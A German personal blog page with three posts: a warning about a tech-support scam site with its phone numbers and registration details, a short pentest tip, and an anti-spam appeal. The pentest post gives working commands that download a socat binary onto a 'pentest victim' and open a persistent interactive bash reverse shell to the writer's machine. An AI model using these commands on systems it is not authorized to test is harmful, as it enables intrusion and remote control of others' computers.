Warnung vor zapexo.de – 08007241757 oder 08001826469

Abgelegt unter Aufklärung, IT, Scam, Sicherheit, Youtube inside am 07.03.2018

Heute von einem Bekannten erfahren, der per Werbe-Einblendung auf nicht-seriösen Seiten wie spiegel.de oder bild.de dazu aufgefordert wurde, bei besagter Nummer anzurufen, da sein PC kaputt/infiziert sei (und ja, wer Werbeanzeigen ungeprüft freigibt, ist unseriös!).

JA, DAS IST BETRUG.
JA, ANZEIGE BEI DER POLIZEI ERSTATTEN MACHT SINN.
Nur so werden diese 0800-Nummern abgeschalten.
(08007241757 oder 08001826469)

Oh halt, vergleichen wir doch mal:
kiesdirekt.de - trustedshops kann man halt doch nicht trauen...

Screenshot 07.03.2018 – kiesdirekt.de – trustedshops kann man halt doch nicht trauen…
https://www.trustedshops.de/bewertung/info_XA142A6FEA335F29F36EBB596D96572DE.html

Ebenfalls darf gerne jeder die Profile bei Facebook, Twitter und Co. melden:
facebook.com/Zapexo-138464286840259/
twitter.com/Zapexo_de
pinterest.de/zapexo/
linkedin.com/company/13616771/
instagram.com/zapexode/

Na denn, wollen wir doch mal sehen, was uns diese Scammer so bieten:

Die Webseite wird in Indien gehostet, und hat trotz .de natürlich KEIN Impressum.
Domain: zapexo.de
IP-Adresse: 103.21.58.238
Provider: Confluence Networks
Region: Mumbai (IN)

Auf der Webseite selbst:
Eschersheimer Landstraße 42
Frankfurt am Main
60322 Germany

Laut Denic:
Anu Khanna
619 Sector 21
Faridabad
121 Faridabad
Indien

Admin-C
(der Klassiker, weil die ja für Jeden den Hampelmann spielen)
Sandra Zell
PTS Privacy & Trustee Services GmbH
Neunkircher-Str. 43
66299 Friedrichsthal
Deutschland

So, ABER:
wenn man in den Quellcode guckt, findet man sowas hier:
gtag('config', 'UA-111872209-1');
Da hätte man doch schon mal einen netten Ansatz, was die noch so machen.
Okay, reverse lookup findet dann z.B. auch sowas wie anleitung.xyz

Ebenfalls findet man noch eine Handynummer: 0157-35989796
Eplus-Netz, wo man die billigsten Prepaid-Karten bekommt.

Aber auch ansonsten ist die Webseite ein „Augenschmaus“, vor allem das viele korrekte Deutsch:

Screengrab zapexo.de

Screengrab zapexo.de vom 07.03.2018

Erinnert mich irgendwie an das hier:

Click on the button below to load the content of YouTube.
Load content

PGlmcmFtZSB3aWR0aD0iNTAwIiBoZWlnaHQ9IjM3NSIgc3JjPSJodHRwczovL3d3dy55b3V0dWJlLmNvbS9lbWJlZC94TnNrVzRSVmJRWT9mZWF0dXJlPW9lbWJlZCIgZnJhbWVib3JkZXI9IjAiIGFsbG93PSJhdXRvcGxheTsgZW5jcnlwdGVkLW1lZGlhIiBhbGxvd2Z1bGxzY3JlZW4+PC9pZnJhbWU+

Alles in Allem:
NIEMANDEN REMOTE AUF SEINEN RECHNER LASSEN, DEN MAN NICHT KENNT!
AUCH WENN DER ANDERE ANGEBLICH VON MICROSOFT IST!


Mit socat eine Remote-Shell spawnen

Abgelegt unter Code, Sicherheit am 22.01.2018

Weil ich dummerweise gerade wieder Strg+C gedrückt habe und mir logischerweise die netcat Remote-Shell dadurch abgenippelt ist…

Entweder ist socat schon auf dem Pentest-Opfer installiert (was zu 0,00001% der Fall ist), oder einfach per wget das entsprechende Binary holen.

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat

Wobei das /tmp-Verzeichnis nicht zwingend beschreibbar sein muß…
Ein chmod +x /tmp/socat dann aber auch nicht vergessen!
(sind noch ein paar ganz andere hilfreiche Binaries zu finden: https://github.com/andrew-d/static-binaries )

Auf dem eigenen Rechner (pentestrechner) dann

socat file:`tty`,raw,echo=0 tcp-listen:12345

Port 12345 ist durch einen beliebigen Port zu ersetzen, Hauptsache er ist von außen zu erreichen… ggf. Firewall/Router das Portforwading einrichten

Und mittels:
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:pentestrechner:12345
klappt es dann auch mit der Remote-Shell, die einem nicht einfach mit Ctrl+C wegstirbt 😛


Ein kleines Spam-Experiment

Abgelegt unter blacklists am 18.12.2017

Mal sehen, ob das den gewünschten Effekt bringt…
http://www.lonesomewalker.com/spam-gegen-spam/

Bitte helft mir damit: wenn Ihr ein eigenes Blog oder Webseite habt, legt ebenfalls so eine Seite an!
Und nennt sie Anders, damit die Spammer nicht einen Filter in Ihre Bots einbauen können, der diese URL ausfiltert.

Ein Mirror dieser einzelnen Seite ist hiermit offiziell erlaubt 😀



blog powered by wordpress
Design by Office and IT - Business Solutions
Optimiert durch suchmaschinen-freundlich

Cookie Preference

Please select an option. You can find more information about the consequences of your choice at Help.

Select an option to continue

Your selection was saved!

Help

Hilfe

Um meine Seite zu besuchen, mußt Du eine Wahl bzgl. der Cookies treffen.

  • Ale Cookies akzeptieren:
    Da kommt der ganze Tracking-Scheiss...
  • Nur first-party Cookies akzeptieren:
    Nur die Cookies meiner Wordpress-Installation.
  • Alle Cookies ablehnen >:-):
    Gar keine Cookies außer vielleicht so Session-Kram (ansonsten deaktiviere bitte Cookies im Webbrowser).

Mein Versprechen: Datenschutz.

Back